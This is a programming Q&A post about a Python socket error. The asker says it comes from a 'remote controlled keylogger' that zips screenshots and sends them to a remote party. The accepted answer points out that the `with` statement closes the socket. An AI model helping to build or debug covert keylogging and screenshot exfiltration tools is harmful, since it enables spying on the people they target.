# python socket [WinError 10038] an operation was attempted on something that is not a socket

Tags: python, sockets

I'm writing a little remote controlled keylogger with sockets on the client side. Everytime `send_pictures_data(self,s_socket)` is executed I get this error when jumping back to my main loop. The file transmission works good but I don't know why the socket is corrupted after the function.

```
    def send_pictures_data(self,s_socket):
        global i
        print("pictures")
        shutil.make_archive('pic'+str(i), 'zip', './screenshots/')
        #f = open('pic.zip','rb')
        #l = f.read(1024)
        #while (l):
           #s_socket.send(l)
           #print('Sent ',repr(l))
           #l = f.read(1024)
        #f.close()
        #s_socket.close()
        file_name = 'pic'+str(i)+'.zip'
        with s_socket,open(file_name,'rb') as f:
```

Comment: First of all, your question is mostly code, a very long code, try to simplify it if you can. second - we don't have line numbers nor do we know what file you're talking about. try to fix that.

Answer (score 0, accepted):

You have `with s_socket` in `send_pictures_data`. What with does is automatically close all of its elements when the code block exits. Thus, when the `with` block ends, the socket will have been closed. Solution: remove `s_socket` from the `with` statement.